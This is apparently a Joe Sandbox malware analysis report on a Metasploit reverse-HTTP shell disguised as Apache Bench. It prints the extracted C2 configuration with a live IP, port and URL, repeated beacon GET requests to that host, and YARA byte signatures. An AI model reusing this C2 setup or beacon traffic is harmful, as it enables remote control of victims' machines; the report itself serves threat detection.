Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
DRVf7H9j4V.exe

Overview

General Information

Sample name:DRVf7H9j4V.exe
renamed because original name is a hash value
Original sample name:ef9e66020f10a61f05bc865b167248d5.exe
Analysis ID:1520612
MD5:ef9e66020f10a61f05bc865b167248d5
SHA1:d17d15d3234e278a6110d1f23ea3369c5c68238c
SHA256:ec8e8680522e7ecb16043670512d860de1f5ee95b7c3cadb4b6612e92a21af77
Tags:exeuser-abuse_ch
Infos:

Detection

Metasploit
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Yara detected Metasploit Payload
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Machine Learning detection for sample
Uses known network protocols on non-standard ports
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Found inlined nop instructions (likely shell or obfuscated code)
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Program does not show much activity (idle)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • DRVf7H9j4V.exe (PID: 4136 cmdline: "C:\Users\user\Desktop\DRVf7H9j4V.exe" MD5: EF9E66020F10A61F05BC865B167248D5)
  • cleanup
{"Type": "Shell Reverse Http", "URL": "http://89.197.154.115:7700/K3rEzPnv_aWkoqWjwlQ_UwwHmzOpx4EBdVmPOf94Dvz96UsIrkE72JilI5LCEjfwvnZxqT-kqcT4DaURLYWyKMdkqDLkLGFtLfbxA06bzLkqpX3YMVK_WF-7csJS2nAg6pLu5gXYS3kF"}
SourceRuleDescriptionAuthorStrings
DRVf7H9j4V.exeJoeSecurity_MetasploitPayload_3Yara detected Metasploit PayloadJoe Security
    DRVf7H9j4V.exeJoeSecurity_MetasploitPayloadYara detected Metasploit PayloadJoe Security
      DRVf7H9j4V.exeWindows_Trojan_Metasploit_24338919Identifies metasploit wininet reverse shellcode. Also used by other tools (like beacon).unknown
      • 0x162d:$a1: 68 6E 65 74 00 68 77 69 6E 69 54 68 4C 77 26 07
      SourceRuleDescriptionAuthorStrings
      00000000.00000002.2240199625.0000000000401000.00000020.00000001.01000000.00000003.sdmpJoeSecurity_MetasploitPayload_3Yara detected Metasploit PayloadJoe Security
        00000000.00000002.2240199625.0000000000401000.00000020.00000001.01000000.00000003.sdmpWindows_Trojan_Metasploit_24338919Identifies metasploit wininet reverse shellcode. Also used by other tools (like beacon).unknown
        • 0x62d:$a1: 68 6E 65 74 00 68 77 69 6E 69 54 68 4C 77 26 07
        00000000.00000002.2240322277.0000000000690000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_MetasploitPayload_3Yara detected Metasploit PayloadJoe Security
          00000000.00000002.2240322277.0000000000690000.00000040.00001000.00020000.00000000.sdmpWindows_Trojan_Metasploit_24338919Identifies metasploit wininet reverse shellcode. Also used by other tools (like beacon).unknown
          • 0x96:$a1: 68 6E 65 74 00 68 77 69 6E 69 54 68 4C 77 26 07
          00000000.00000000.1451835611.0000000000401000.00000020.00000001.01000000.00000003.sdmpJoeSecurity_MetasploitPayload_3Yara detected Metasploit PayloadJoe Security
            Click to see the 1 entries
            SourceRuleDescriptionAuthorStrings
            0.0.DRVf7H9j4V.exe.400000.0.unpackJoeSecurity_MetasploitPayload_3Yara detected Metasploit PayloadJoe Security
              0.0.DRVf7H9j4V.exe.400000.0.unpackJoeSecurity_MetasploitPayloadYara detected Metasploit PayloadJoe Security
                0.0.DRVf7H9j4V.exe.400000.0.unpackWindows_Trojan_Metasploit_24338919Identifies metasploit wininet reverse shellcode. Also used by other tools (like beacon).unknown
                • 0x162d:$a1: 68 6E 65 74 00 68 77 69 6E 69 54 68 4C 77 26 07
                0.2.DRVf7H9j4V.exe.400000.0.unpackJoeSecurity_MetasploitPayload_3Yara detected Metasploit PayloadJoe Security
                  0.2.DRVf7H9j4V.exe.400000.0.unpackJoeSecurity_MetasploitPayloadYara detected Metasploit PayloadJoe Security
                    Click to see the 1 entries
                    No Sigma rule has matched
                    No Suricata rule has matched

                    Click to jump to signature section

                    Show All Signature Results

                    AV Detection

                    barindex
                    Source: DRVf7H9j4V.exeAvira: detected
                    Source: DRVf7H9j4V.exeMalware Configuration Extractor: Metasploit {"Type": "Shell Reverse Http", "URL": "http://89.197.154.115:7700/K3rEzPnv_aWkoqWjwlQ_UwwHmzOpx4EBdVmPOf94Dvz96UsIrkE72JilI5LCEjfwvnZxqT-kqcT4DaURLYWyKMdkqDLkLGFtLfbxA06bzLkqpX3YMVK_WF-7csJS2nAg6pLu5gXYS3kF"}
                    Source: DRVf7H9j4V.exeReversingLabs: Detection: 81%
                    Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                    Source: DRVf7H9j4V.exeJoe Sandbox ML: detected
                    Source: DRVf7H9j4V.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                    Source: Binary string: C:\local0\asf\release\build-2.2.14\support\Release\ab.pdb source: DRVf7H9j4V.exe
                    Source: C:\Users\user\Desktop\DRVf7H9j4V.exeCode function: 4x nop then xor edx, dword ptr [90909090h]0_2_0040A430
                    Source: C:\Users\user\Desktop\DRVf7H9j4V.exeCode function: 4x nop then push ebp0_2_00401E39
                    Source: C:\Users\user\Desktop\DRVf7H9j4V.exeCode function: 4x nop then sti 0_2_004056C0
                    Source: C:\Users\user\Desktop\DRVf7H9j4V.exeCode function: 4x nop then enter FAFFh, 90h0_2_004066E0
                    Source: C:\Users\user\Desktop\DRVf7H9j4V.exeCode function: 4x nop then sti 0_2_004056F0
                    Source: C:\Users\user\Desktop\DRVf7H9j4V.exeCode function: 4x nop then or dword ptr [ebx+104D8BECh], 8B08456Dh0_2_00408680
                    Source: C:\Users\user\Desktop\DRVf7H9j4V.exeCode function: 4x nop then xchg dword ptr [eax+21909081h], edx0_2_004058A1
                    Source: C:\Users\user\Desktop\DRVf7H9j4V.exeCode function: 4x nop then sti 0_2_004056B1
                    Source: C:\Users\user\Desktop\DRVf7H9j4V.exeCode function: 4x nop then sti 0_2_0040566F
                    Source: C:\Users\user\Desktop\DRVf7H9j4V.exeCode function: 4x nop then enter FAFFh, 90h0_2_004067C3
                    Source: C:\Users\user\Desktop\DRVf7H9j4V.exeCode function: 4x nop then xchg dword ptr [eax+21909081h], edx0_2_004059A4

                    Networking

                    barindex
                    Source: Malware configuration extractorURLs: http://89.197.154.115:7700/K3rEzPnv_aWkoqWjwlQ_UwwHmzOpx4EBdVmPOf94Dvz96UsIrkE72JilI5LCEjfwvnZxqT-kqcT4DaURLYWyKMdkqDLkLGFtLfbxA06bzLkqpX3YMVK_WF-7csJS2nAg6pLu5gXYS3kF
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49704 -> 7700
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49705 -> 7700
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49706 -> 7700
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49713 -> 7700
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49714 -> 7700
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49715 -> 7700
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49716 -> 7700
                    Source: unknownNetwork traffic detected: HTTP traffic on port 63653 -> 7700
                    Source: unknownNetwork traffic detected: HTTP traffic on port 63654 -> 7700
                    Source: unknownNetwork traffic detected: HTTP traffic on port 63655 -> 7700
                    Source: global trafficTCP traffic: 192.168.2.8:49704 -> 89.197.154.115:7700
                    Source: Joe Sandbox ViewIP Address: 89.197.154.115 89.197.154.115
                    Source: Joe Sandbox ViewASN Name: VIRTUAL1GB VIRTUAL1GB
                    Source: global trafficHTTP traffic detected: GET /K3rEzPnv_aWkoqWjwlQ_UwwHmzOpx4EBdVmPOf94Dvz96UsIrkE72JilI5LCEjfwvnZxqT-kqcT4DaURLYWyKMdkqDLkLGFtLfbxA06bzLkqpX3YMVK_WF-7csJS2nAg6pLu5gXYS3kF HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0Host: 89.197.154.115:7700Connection: Keep-AliveCache-Control: no-cache
                    Source: global trafficHTTP traffic detected: GET /K3rEzPnv_aWkoqWjwlQ_UwwHmzOpx4EBdVmPOf94Dvz96UsIrkE72JilI5LCEjfwvnZxqT-kqcT4DaURLYWyKMdkqDLkLGFtLfbxA06bzLkqpX3YMVK_WF-7csJS2nAg6pLu5gXYS3kF HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0Host: 89.197.154.115:7700Connection: Keep-AliveCache-Control: no-cache
                    Source: global trafficHTTP traffic detected: GET /K3rEzPnv_aWkoqWjwlQ_UwwHmzOpx4EBdVmPOf94Dvz96UsIrkE72JilI5LCEjfwvnZxqT-kqcT4DaURLYWyKMdkqDLkLGFtLfbxA06bzLkqpX3YMVK_WF-7csJS2nAg6pLu5gXYS3kF HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0Host: 89.197.154.115:7700Connection: Keep-AliveCache-Control: no-cache
                    Source: global trafficHTTP traffic detected: GET /K3rEzPnv_aWkoqWjwlQ_UwwHmzOpx4EBdVmPOf94Dvz96UsIrkE72JilI5LCEjfwvnZxqT-kqcT4DaURLYWyKMdkqDLkLGFtLfbxA06bzLkqpX3YMVK_WF-7csJS2nAg6pLu5gXYS3kF HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0Host: 89.197.154.115:7700Connection: Keep-AliveCache-Control: no-cache
                    Source: global trafficHTTP traffic detected: GET /K3rEzPnv_aWkoqWjwlQ_UwwHmzOpx4EBdVmPOf94Dvz96UsIrkE72JilI5LCEjfwvnZxqT-kqcT4DaURLYWyKMdkqDLkLGFtLfbxA06bzLkqpX3YMVK_WF-7csJS2nAg6pLu5gXYS3kF HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0Host: 89.197.154.115:7700Connection: Keep-AliveCache-Control: no-cache
                    Source: global trafficHTTP traffic detected: GET /K3rEzPnv_aWkoqWjwlQ_UwwHmzOpx4EBdVmPOf94Dvz96UsIrkE72JilI5LCEjfwvnZxqT-kqcT4DaURLYWyKMdkqDLkLGFtLfbxA06bzLkqpX3YMVK_WF-7csJS2nAg6pLu5gXYS3kF HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0Host: 89.197.154.115:7700Connection: Keep-AliveCache-Control: no-cache
                    Source: global trafficHTTP traffic detected: GET /K3rEzPnv_aWkoqWjwlQ_UwwHmzOpx4EBdVmPOf94Dvz96UsIrkE72JilI5LCEjfwvnZxqT-kqcT4DaURLYWyKMdkqDLkLGFtLfbxA06bzLkqpX3YMVK_WF-7csJS2nAg6pLu5gXYS3kF HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0Host: 89.197.154.115:7700Connection: Keep-AliveCache-Control: no-cache
                    Source: global trafficHTTP traffic detected: GET /K3rEzPnv_aWkoqWjwlQ_UwwHmzOpx4EBdVmPOf94Dvz96UsIrkE72JilI5LCEjfwvnZxqT-kqcT4DaURLYWyKMdkqDLkLGFtLfbxA06bzLkqpX3YMVK_WF-7csJS2nAg6pLu5gXYS3kF HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0Host: 89.197.154.115:7700Connection: Keep-AliveCache-Control: no-cache
                    Source: global trafficHTTP traffic detected: GET /K3rEzPnv_aWkoqWjwlQ_UwwHmzOpx4EBdVmPOf94Dvz96UsIrkE72JilI5LCEjfwvnZxqT-kqcT4DaURLYWyKMdkqDLkLGFtLfbxA06bzLkqpX3YMVK_WF-7csJS2nAg6pLu5gXYS3kF HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0Host: 89.197.154.115:7700Connection: Keep-AliveCache-Control: no-cache
                    Source: global trafficHTTP traffic detected: GET /K3rEzPnv_aWkoqWjwlQ_UwwHmzOpx4EBdVmPOf94Dvz96UsIrkE72JilI5LCEjfwvnZxqT-kqcT4DaURLYWyKMdkqDLkLGFtLfbxA06bzLkqpX3YMVK_WF-7csJS2nAg6pLu5gXYS3kF HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0Host: 89.197.154.115:7700Connection: Keep-AliveCache-Control: no-cache
                    Source: unknownTCP traffic detected without corresponding DNS query: 89.197.154.115
                    Source: unknownTCP traffic detected without corresponding DNS query: 89.197.154.115
                    Source: unknownTCP traffic detected without corresponding DNS query: 89.197.154.115
                    Source: unknownTCP traffic detected without corresponding DNS query: 89.197.154.115
                    Source: unknownTCP traffic detected without corresponding DNS query: 89.197.154.115
                    Source: unknownTCP traffic detected without corresponding DNS query: 89.197.154.115
                    Source: unknownTCP traffic detected without corresponding DNS query: 89.197.154.115
                    Source: unknownTCP traffic detected without corresponding DNS query: 89.197.154.115
                    Source: unknownTCP traffic detected without corresponding DNS query: 89.197.154.115
                    Source: unknownTCP traffic detected without corresponding DNS query: 89.197.154.115
                    Source: unknownTCP traffic detected without corresponding DNS query: 89.197.154.115
                    Source: unknownTCP traffic detected without corresponding DNS query: 89.197.154.115
                    Source: unknownTCP traffic detected without corresponding DNS query: 89.197.154.115
                    Source: unknownTCP traffic detected without corresponding DNS query: 89.197.154.115
                    Source: unknownTCP traffic detected without corresponding DNS query: 89.197.154.115
                    Source: unknownTCP traffic detected without corresponding DNS query: 89.197.154.115
                    Source: unknownTCP traffic detected without corresponding DNS query: 89.197.154.115
                    Source: unknownTCP traffic detected without corresponding DNS query: 89.197.154.115
                    Source: unknownTCP traffic detected without corresponding DNS query: 89.197.154.115
                    Source: unknownTCP traffic detected without corresponding DNS query: 89.197.154.115
                    Source: unknownTCP traffic detected without corresponding DNS query: 89.197.154.115
                    Source: unknownTCP traffic detected without corresponding DNS query: 89.197.154.115
                    Source: unknownTCP traffic detected without corresponding DNS query: 89.197.154.115
                    Source: unknownTCP traffic detected without corresponding DNS query: 89.197.154.115
                    Source: unknownTCP traffic detected without corresponding DNS query: 89.197.154.115
                    Source: unknownTCP traffic detected without corresponding DNS query: 89.197.154.115
                    Source: unknownTCP traffic detected without corresponding DNS query: 89.197.154.115
                    Source: unknownTCP traffic detected without corresponding DNS query: 89.197.154.115
                    Source: unknownTCP traffic detected without corresponding DNS query: 89.197.154.115
                    Source: unknownTCP traffic detected without corresponding DNS query: 89.197.154.115
                    Source: unknownTCP traffic detected without corresponding DNS query: 89.197.154.115
                    Source: unknownTCP traffic detected without corresponding DNS query: 89.197.154.115
                    Source: unknownTCP traffic detected without corresponding DNS query: 89.197.154.115
                    Source: unknownTCP traffic detected without corresponding DNS query: 89.197.154.115
                    Source: unknownTCP traffic detected without corresponding DNS query: 89.197.154.115
                    Source: unknownTCP traffic detected without corresponding DNS query: 89.197.154.115
                    Source: unknownTCP traffic detected without corresponding DNS query: 89.197.154.115
                    Source: unknownTCP traffic detected without corresponding DNS query: 89.197.154.115
                    Source: unknownTCP traffic detected without corresponding DNS query: 89.197.154.115
                    Source: unknownTCP traffic detected without corresponding DNS query: 89.197.154.115
                    Source: unknownTCP traffic detected without corresponding DNS query: 89.197.154.115
                    Source: unknownTCP traffic detected without corresponding DNS query: 89.197.154.115
                    Source: unknownTCP traffic detected without corresponding DNS query: 89.197.154.115
                    Source: unknownTCP traffic detected without corresponding DNS query: 89.197.154.115
                    Source: unknownTCP traffic detected without corresponding DNS query: 89.197.154.115
                    Source: unknownTCP traffic detected without corresponding DNS query: 89.197.154.115
                    Source: unknownTCP traffic detected without corresponding DNS query: 89.197.154.115
                    Source: unknownTCP traffic detected without corresponding DNS query: 89.197.154.115
                    Source: unknownTCP traffic detected without corresponding DNS query: 89.197.154.115
                    Source: unknownTCP traffic detected without corresponding DNS query: 89.197.154.115
                    Source: global trafficHTTP traffic detected: GET /K3rEzPnv_aWkoqWjwlQ_UwwHmzOpx4EBdVmPOf94Dvz96UsIrkE72JilI5LCEjfwvnZxqT-kqcT4DaURLYWyKMdkqDLkLGFtLfbxA06bzLkqpX3YMVK_WF-7csJS2nAg6pLu5gXYS3kF HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0Host: 89.197.154.115:7700Connection: Keep-AliveCache-Control: no-cache
                    Source: global trafficHTTP traffic detected: GET /K3rEzPnv_aWkoqWjwlQ_UwwHmzOpx4EBdVmPOf94Dvz96UsIrkE72JilI5LCEjfwvnZxqT-kqcT4DaURLYWyKMdkqDLkLGFtLfbxA06bzLkqpX3YMVK_WF-7csJS2nAg6pLu5gXYS3kF HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0Host: 89.197.154.115:7700Connection: Keep-AliveCache-Control: no-cache
                    Source: global trafficHTTP traffic detected: GET /K3rEzPnv_aWkoqWjwlQ_UwwHmzOpx4EBdVmPOf94Dvz96UsIrkE72JilI5LCEjfwvnZxqT-kqcT4DaURLYWyKMdkqDLkLGFtLfbxA06bzLkqpX3YMVK_WF-7csJS2nAg6pLu5gXYS3kF HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0Host: 89.197.154.115:7700Connection: Keep-AliveCache-Control: no-cache
                    Source: global trafficHTTP traffic detected: GET /K3rEzPnv_aWkoqWjwlQ_UwwHmzOpx4EBdVmPOf94Dvz96UsIrkE72JilI5LCEjfwvnZxqT-kqcT4DaURLYWyKMdkqDLkLGFtLfbxA06bzLkqpX3YMVK_WF-7csJS2nAg6pLu5gXYS3kF HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0Host: 89.197.154.115:7700Connection: Keep-AliveCache-Control: no-cache
                    Source: global trafficHTTP traffic detected: GET /K3rEzPnv_aWkoqWjwlQ_UwwHmzOpx4EBdVmPOf94Dvz96UsIrkE72JilI5LCEjfwvnZxqT-kqcT4DaURLYWyKMdkqDLkLGFtLfbxA06bzLkqpX3YMVK_WF-7csJS2nAg6pLu5gXYS3kF HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0Host: 89.197.154.115:7700Connection: Keep-AliveCache-Control: no-cache
                    Source: global trafficHTTP traffic detected: GET /K3rEzPnv_aWkoqWjwlQ_UwwHmzOpx4EBdVmPOf94Dvz96UsIrkE72JilI5LCEjfwvnZxqT-kqcT4DaURLYWyKMdkqDLkLGFtLfbxA06bzLkqpX3YMVK_WF-7csJS2nAg6pLu5gXYS3kF HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0Host: 89.197.154.115:7700Connection: Keep-AliveCache-Control: no-cache
                    Source: global trafficHTTP traffic detected: GET /K3rEzPnv_aWkoqWjwlQ_UwwHmzOpx4EBdVmPOf94Dvz96UsIrkE72JilI5LCEjfwvnZxqT-kqcT4DaURLYWyKMdkqDLkLGFtLfbxA06bzLkqpX3YMVK_WF-7csJS2nAg6pLu5gXYS3kF HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0Host: 89.197.154.115:7700Connection: Keep-AliveCache-Control: no-cache
                    Source: global trafficHTTP traffic detected: GET /K3rEzPnv_aWkoqWjwlQ_UwwHmzOpx4EBdVmPOf94Dvz96UsIrkE72JilI5LCEjfwvnZxqT-kqcT4DaURLYWyKMdkqDLkLGFtLfbxA06bzLkqpX3YMVK_WF-7csJS2nAg6pLu5gXYS3kF HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0Host: 89.197.154.115:7700Connection: Keep-AliveCache-Control: no-cache
                    Source: global trafficHTTP traffic detected: GET /K3rEzPnv_aWkoqWjwlQ_UwwHmzOpx4EBdVmPOf94Dvz96UsIrkE72JilI5LCEjfwvnZxqT-kqcT4DaURLYWyKMdkqDLkLGFtLfbxA06bzLkqpX3YMVK_WF-7csJS2nAg6pLu5gXYS3kF HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0Host: 89.197.154.115:7700Connection: Keep-AliveCache-Control: no-cache
                    Source: global trafficHTTP traffic detected: GET /K3rEzPnv_aWkoqWjwlQ_UwwHmzOpx4EBdVmPOf94Dvz96UsIrkE72JilI5LCEjfwvnZxqT-kqcT4DaURLYWyKMdkqDLkLGFtLfbxA06bzLkqpX3YMVK_WF-7csJS2nAg6pLu5gXYS3kF HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0Host: 89.197.154.115:7700Connection: Keep-AliveCache-Control: no-cache
                    Source: DRVf7H9j4V.exe, 00000000.00000002.2240362748.000000000078D000.00000004.00000020.00020000.00000000.sdmp, DRVf7H9j4V.exe, 00000000.00000002.2240362748.00000000007AE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://89.197.154.115:7700/K3rEzPnv_aWkoqWjwlQ_UwwHmzOpx4EBdVmPOf94Dvz96UsIrkE72JilI5LCEjfwvnZxqT-kq
                    Source: DRVf7H9j4V.exeString found in binary or memory: http://www.apache.org/
                    Source: DRVf7H9j4V.exeString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
                    Source: DRVf7H9j4V.exeString found in binary or memory: http://www.zeustech.net/

                    System Summary

                    barindex
                    Source: DRVf7H9j4V.exe, type: SAMPLEMatched rule: Identifies metasploit wininet reverse shellcode. Also used by other tools (like beacon). Author: unknown
                    Source: 0.0.DRVf7H9j4V.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Identifies metasploit wininet reverse shellcode. Also used by other tools (like beacon). Author: unknown
                    Source: 0.2.DRVf7H9j4V.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Identifies metasploit wininet reverse shellcode. Also used by other tools (like beacon). Author: unknown
                    Source: 00000000.00000002.2240199625.0000000000401000.00000020.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: Identifies metasploit wininet reverse shellcode. Also used by other tools (like beacon). Author: unknown
                    Source: 00000000.00000002.2240322277.0000000000690000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Identifies metasploit wininet reverse shellcode. Also used by other tools (like beacon). Author: unknown
                    Source: 00000000.00000000.1451835611.0000000000401000.00000020.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: Identifies metasploit wininet reverse shellcode. Also used by other tools (like beacon). Author: unknown
                    Source: C:\Users\user\Desktop\DRVf7H9j4V.exeCode function: 0_2_0040162C0_2_0040162C
                    Source: C:\Users\user\Desktop\DRVf7H9j4V.exeCode function: 0_2_006900950_2_00690095
                    Source: DRVf7H9j4V.exe, 00000000.00000002.2240246457.0000000000415000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameab.exeF vs DRVf7H9j4V.exe
                    Source: DRVf7H9j4V.exeBinary or memory string: OriginalFilenameab.exeF vs DRVf7H9j4V.exe
                    Source: DRVf7H9j4V.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                    Source: DRVf7H9j4V.exe, type: SAMPLEMatched rule: Windows_Trojan_Metasploit_24338919 os = windows, severity = x86, description = Identifies metasploit wininet reverse shellcode. Also used by other tools (like beacon)., creation_date = 2021-03-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Metasploit, fingerprint = ac76190a84c4bdbb6927c5ad84a40e2145ca9e76369a25ac2ffd727eefef4804, id = 24338919-8efe-4cf2-a23a-a3f22095b42d, last_modified = 2021-08-23
                    Source: 0.0.DRVf7H9j4V.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Metasploit_24338919 os = windows, severity = x86, description = Identifies metasploit wininet reverse shellcode. Also used by other tools (like beacon)., creation_date = 2021-03-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Metasploit, fingerprint = ac76190a84c4bdbb6927c5ad84a40e2145ca9e76369a25ac2ffd727eefef4804, id = 24338919-8efe-4cf2-a23a-a3f22095b42d, last_modified = 2021-08-23
                    Source: 0.2.DRVf7H9j4V.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Metasploit_24338919 os = windows, severity = x86, description = Identifies metasploit wininet reverse shellcode. Also used by other tools (like beacon)., creation_date = 2021-03-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Metasploit, fingerprint = ac76190a84c4bdbb6927c5ad84a40e2145ca9e76369a25ac2ffd727eefef4804, id = 24338919-8efe-4cf2-a23a-a3f22095b42d, last_modified = 2021-08-23
                    Source: 00000000.00000002.2240199625.0000000000401000.00000020.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: Windows_Trojan_Metasploit_24338919 os = windows, severity = x86, description = Identifies metasploit wininet reverse shellcode. Also used by other tools (like beacon)., creation_date = 2021-03-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Metasploit, fingerprint = ac76190a84c4bdbb6927c5ad84a40e2145ca9e76369a25ac2ffd727eefef4804, id = 24338919-8efe-4cf2-a23a-a3f22095b42d, last_modified = 2021-08-23
                    Source: 00000000.00000002.2240322277.0000000000690000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Metasploit_24338919 os = windows, severity = x86, description = Identifies metasploit wininet reverse shellcode. Also used by other tools (like beacon)., creation_date = 2021-03-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Metasploit, fingerprint = ac76190a84c4bdbb6927c5ad84a40e2145ca9e76369a25ac2ffd727eefef4804, id = 24338919-8efe-4cf2-a23a-a3f22095b42d, last_modified = 2021-08-23
                    Source: 00000000.00000000.1451835611.0000000000401000.00000020.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: Windows_Trojan_Metasploit_24338919 os = windows, severity = x86, description = Identifies metasploit wininet reverse shellcode. Also used by other tools (like beacon)., creation_date = 2021-03-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Metasploit, fingerprint = ac76190a84c4bdbb6927c5ad84a40e2145ca9e76369a25ac2ffd727eefef4804, id = 24338919-8efe-4cf2-a23a-a3f22095b42d, last_modified = 2021-08-23
                    Source: DRVf7H9j4V.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    Source: classification engineClassification label: mal100.troj.winEXE@1/0@0/1
                    Source: DRVf7H9j4V.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    Source: C:\Users\user\Desktop\DRVf7H9j4V.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                    Source: DRVf7H9j4V.exeReversingLabs: Detection: 81%
                    Source: C:\Users\user\Desktop\DRVf7H9j4V.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Users\user\Desktop\DRVf7H9j4V.exeSection loaded: wsock32.dllJump to behavior
                    Source: C:\Users\user\Desktop\DRVf7H9j4V.exeSection loaded: wininet.dllJump to behavior
                    Source: C:\Users\user\Desktop\DRVf7H9j4V.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Users\user\Desktop\DRVf7H9j4V.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Users\user\Desktop\DRVf7H9j4V.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\Desktop\DRVf7H9j4V.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\Desktop\DRVf7H9j4V.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\DRVf7H9j4V.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\Desktop\DRVf7H9j4V.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Users\user\Desktop\DRVf7H9j4V.exeSection loaded: winhttp.dllJump to behavior
                    Source: C:\Users\user\Desktop\DRVf7H9j4V.exeSection loaded: mswsock.dllJump to behavior
                    Source: C:\Users\user\Desktop\DRVf7H9j4V.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\DRVf7H9j4V.exeSection loaded: winnsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\DRVf7H9j4V.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32Jump to behavior
                    Source: DRVf7H9j4V.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
